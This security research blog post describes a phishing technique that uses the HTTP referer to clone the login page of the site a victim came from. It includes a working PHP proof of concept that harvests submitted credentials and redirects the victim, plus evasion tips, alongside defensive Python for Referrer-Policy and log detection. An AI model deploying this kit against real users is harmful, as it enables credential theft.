
Dynamically create a phishing page based on the HTTP referer header

June 11, 2019 By Craig Hays 1 Comment


Auto-generated phishing pages and the social web.

(The following is a cybersecurity research article on credential theft using non-traditional and underexploited phishing methods.)

You’re browsing the web. You’re logged into an online discussion space such as YouTube, Reddit, Twitter, Medium, a small community forum, etc. You click on a link from another user to another page on the same site. Instead of seeing the content you’re looking for, you’re presented with the login page for the site you’re already on. Annoyed and a little confused as to why you’ve been logged out, you log back in and are taken to the content you were expecting.

You’ve just been phished.

Creating Phishing pages based on the HTTP referer tag

When we hear “phishing attack” we usually think of email. We don’t usually think of web-based attacks delivered through online discussion sites, because these would normally be easy to spot and block. The novelty of this attack is in using the HTTP referer header to customize the phishing page as the victim lands on it, so that it looks like a bug in the site’s usual user experience. After all, how many times have you been browsing a site and then been randomly asked to log back in again?

How dynamic phishing page creation works

(Figure: How dynamic phishing pages work)

Submit a phishing link to an online discussion space where users are likely already logged in

The link text will look like it points to another location on the same site, but it actually points to the dynamic phishing page engine.

The victim clicks on the link to what they expect to be another post on the site

This could be another video, tweet, image, blog post, comment, etc.

The victim’s browser requests the dynamic phishing page from the engine

This request also carries the HTTP referer header, which tells the engine which site the user was on previously.

The dynaphish engine examines the HTTP referer tag and retrieves the login page for that site

It does this by making requests to the referrer site for common login page paths such as /login, /admin, /user, /sign-up?type=login, etc.

The dynaphish engine renders a login page identical to that of the referrer site except for the POST target of the login form

This includes any dynamic content already on the site such as current news, headlines, top posts, tweets, etc.

The user ‘logs in’ and is redirected back to the expected content in their existing session

As they already have a session open, it looks like everything worked. They get the content they were looking for and are unaware that anything strange has happened.
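The referer header in step three is the only thing the engine has to go on, and whether the victim’s browser sends it at all is decided by the Referrer-Policy the discussion site serves. The following is an added example, not code from the original post: it models what a browser puts in the Referer header under each standard Referrer-Policy value when a user follows a link from one page to another. The URLs are constructed, and origin comparison ignores default-port normalisation (an assumption to keep the example short). It shows that the current browser default (strict-origin-when-cross-origin) still reveals the origin, which is all the engine needs to pick a login page to clone, whereas same-origin or no-referrer leaves it with nothing.

```python
"""Added example, not part of the original post: what a browser sends in the
Referer header under each standard Referrer-Policy value.  URLs below are
constructed; origin comparison ignores default-port normalisation (assumption)."""
from urllib.parse import urlsplit, urlunsplit


def origin(url: str) -> str:
    """scheme://host[:port] with no path, credentials or fragment."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.hostname}" + (f":{p.port}" if p.port else "")


def _full_referrer(url: str) -> str:
    """Browsers strip userinfo and the fragment before sending a full URL."""
    p = urlsplit(url)
    netloc = p.hostname + (f":{p.port}" if p.port else "")
    return urlunsplit((p.scheme, netloc, p.path or "/", p.query, ""))


def _is_downgrade(src: str, dst: str) -> bool:
    """https -> http is a downgrade; the 'strict' and 'when-downgrade' policies then send nothing."""
    return urlsplit(src).scheme == "https" and urlsplit(dst).scheme == "http"


def referer_for(policy: str, src: str, dst: str):
    """Return the Referer value sent when navigating from src to dst, or None if nothing is sent."""
    same = origin(src) == origin(dst)
    down = _is_downgrade(src, dst)
    origin_only = origin(src) + "/"   # origin-only referrers are serialised with a trailing slash
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return _full_referrer(src)
    if policy == "no-referrer-when-downgrade":
        return None if down else _full_referrer(src)
    if policy == "same-origin":
        return _full_referrer(src) if same else None
    if policy == "origin":
        return origin_only
    if policy == "strict-origin":
        return None if down else origin_only
    if policy == "origin-when-cross-origin":
        return _full_referrer(src) if same else origin_only
    if policy == "strict-origin-when-cross-origin":   # the default in current browsers
        if same:
            return _full_referrer(src)
        return None if down else origin_only
    raise ValueError(f"unknown policy: {policy}")


def engine_learns_origin(policy: str, src: str, dst: str) -> bool:
    """True if a cross-origin landing page could work out which site the visitor came from."""
    ref = referer_for(policy, src, dst)
    return ref is not None and origin(ref) == origin(src)


if __name__ == "__main__":
    forum = "https://forum.example/t/1234?sort=new"   # constructed: the page the victim is on
    engine = "https://short.example/r/abc"            # constructed: the cross-origin landing page
    for pol in ("strict-origin-when-cross-origin", "same-origin", "no-referrer"):
        print(f"{pol:34} -> {referer_for(pol, forum, engine)!r}  "
              f"site identifiable: {engine_learns_origin(pol, forum, engine)}")
```

Serving `Referrer-Policy: same-origin` (or `no-referrer`) on the discussion site is therefore a cheap mitigation for this specific technique: the landing page receives no referer for cross-origin clicks and falls through to the engine’s error branch. It does not stop a link that is hand-crafted for one known target site, so it complements rather than replaces the usual phishing controls.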

What this needs in order to work

Now, not everything is that simple. This attack relies on a few things:

  • The users trust the site they’re already on. The phishing page pulls enough recent content from the target site to look believable without close inspection. We train our users to check for padlocks, green bars, SSL certificates, correct domain names, etc. in emails, but we generally don’t do this as meticulously when deep into a browsing session on one site.
  • The dynaphish engine can differentiate real users from bots and site admins. As it inspects the headers of each web request before rendering content, it can mask its intentions from unwanted user agents, IP addresses, referers, and devices.
  • The domain can’t be on a known bad actor list. Rendering the phishing page content dynamically makes it more difficult for analysis tools to identify the page as malicious until execution time, at which point it may be too late.

Dynamic referer phishing pages – A Proof of Concept

Here’s a very basic proof of concept that needs just two PHP files. The first is the landing page, which downloads and presents the content of the referring website’s login page. The second is a credential capture and user forwarding page.

<?php
// index.php - landing page: clones the login page of the site the visitor came from
if (isset($_SERVER['HTTP_REFERER'])) {
	$referer   = $_SERVER['HTTP_REFERER'];
	$stripped  = stripUrlPath($referer);       // scheme://host/
	$url       = $stripped . "login";          // e.g. https://host/login (no doubled slash)
	$loginpage = file_get_contents($url);      // remote fetch; requires allow_url_fopen=On
	$dom = new DOMDocument();
	$dom->loadHTML($loginpage);
	// Re-point every form at the capture script; the original page is carried in the query string
	foreach ($dom->getElementsByTagName('form') as $form) {
		$form->setAttribute('action', 'login.php?target=' . $referer);
	}
	print $dom->saveHTML();
} else {
	// No Referer header (direct visit, or a site sending a strict Referrer-Policy): nothing to clone
	print "error";
}

function stripUrlPath($url) {
	$urlParts = parse_url($url);
	return $urlParts['scheme'] . "://" . $urlParts['host'] . "/";
}
?>
<?php
// login.php - capture page: append the submitted fields to a log, then forward the user
$req_dump = print_r($_REQUEST, TRUE);
$fp = fopen('request.log', 'a');
fwrite($fp, $req_dump);
fclose($fp);
// Send the user back to the page they originally clicked; their real session there is still valid
header('Location: ' . $_GET["target"]);
?>

Why this works

By dynamically creating the phishing page it is easier to evade detection, gain the trust of users by presenting an expected screen that is identical to the real thing, and easier to deploy as any compromised website can host a landing page for any other site.

By using a dynamic redirection mechanism that behaves like any URL shortener, it is possible to load balance across thousands of compromised websites through a few routing domains, which adds a level of resilience to the design.
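From the target site’s side, both halves of this design leave traces in ordinary web server logs: the engine’s probing of guessed login paths (step four, and the `file_get_contents` call in the proof of concept) appears as one client walking /login, /admin, /user and /sign-up in quick succession, and later the victim’s own browser shows up fetching absolute-URL assets, or landing on the post-login redirect, with a Referer on a host that is not ours. The following is an added example, not from the original post: it parses a few constructed Apache combined-format log lines and flags both patterns. `OUR_HOSTS`, the IP addresses, paths and timings are all constructed, and the 30-second window and two-hit threshold are tunable assumptions.

```python
"""Added example, not part of the original post: flag login-path probing and
foreign-referer traffic in web server logs.  All log lines, hosts and IPs are constructed."""
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Apache "combined" format: ip ident user [ts] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

OUR_HOSTS = {"forum.example"}                              # constructed: hosts we serve
PROBE_PATHS = {"/login", "/admin", "/user", "/sign-up"}    # the guessed login paths the post lists

# Constructed sample: one client probes the login paths, then a victim's browser arrives
# (asset fetch and post-login redirect) with a Referer pointing at a foreign host.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jun/2019:10:00:01 +0000] "GET /login HTTP/1.1" 200 5120 "-" "-"
203.0.113.7 - - [11/Jun/2019:10:00:02 +0000] "GET /admin HTTP/1.1" 404 312 "-" "-"
203.0.113.7 - - [11/Jun/2019:10:00:02 +0000] "GET /sign-up?type=login HTTP/1.1" 200 5120 "-" "-"
198.51.100.4 - - [11/Jun/2019:10:00:40 +0000] "GET /t/1234 HTTP/1.1" 200 9000 "https://forum.example/" "Mozilla/5.0"
198.51.100.4 - - [11/Jun/2019:10:01:05 +0000] "GET /static/logo.png HTTP/1.1" 200 2048 "https://short.example/r/abc" "Mozilla/5.0"
198.51.100.4 - - [11/Jun/2019:10:01:20 +0000] "GET /t/1234 HTTP/1.1" 200 9000 "https://short.example/r/abc" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["path"] = urlsplit(entry["path"]).path   # drop the query string (?type=login)
    return entry


def find_login_probers(entries, window=timedelta(seconds=30), min_hits=2):
    """IPs that request at least min_hits of the guessed login paths within one window."""
    times_by_ip = {}
    for e in entries:
        if e["path"] in PROBE_PATHS:
            times_by_ip.setdefault(e["ip"], []).append(e["ts"])
    flagged = set()
    for ip, times in times_by_ip.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            if j - i >= min_hits:
                flagged.add(ip)
                break
    return flagged


def find_foreign_referers(entries):
    """(ip, referer host, path) for requests whose Referer names a host we do not serve."""
    hits = []
    for e in entries:
        ref = e["referer"]
        if ref in ("-", ""):
            continue
        host = urlsplit(ref).hostname
        if host and host not in OUR_HOSTS:
            hits.append((e["ip"], host, e["path"]))
    return hits


def analyse(log_text: str) -> dict:
    """Run both detections over a block of log text."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    return {
        "probers": find_login_probers(entries),
        "foreign_referers": find_foreign_referers(entries),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    print("login-path probers:", sorted(result["probers"]))
    for ip, host, path in result["foreign_referers"]:
        print(f"foreign referer: {ip} fetched {path} from a page on {host}")
```

The foreign-referer hits are the more actionable of the two: the host they name is a landing page that is already serving a copy of our login form, so it can be reported for takedown and added to the organisation’s blocklists. Which patterns a browser actually reveals depends on the Referrer-Policy of the page hosting the form, so treat an absence of hits as inconclusive rather than as proof that no cloning is happening.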

Comments

  1. odiraa says

    January 6, 2021 at 2:07 am

    Please, I would like to learn how to build this on my own. This is just for education purposes because I am in love with IT, but I am not so lucky as to have someone around to put me through.

· © Craig Hays, 2006–2023 ·
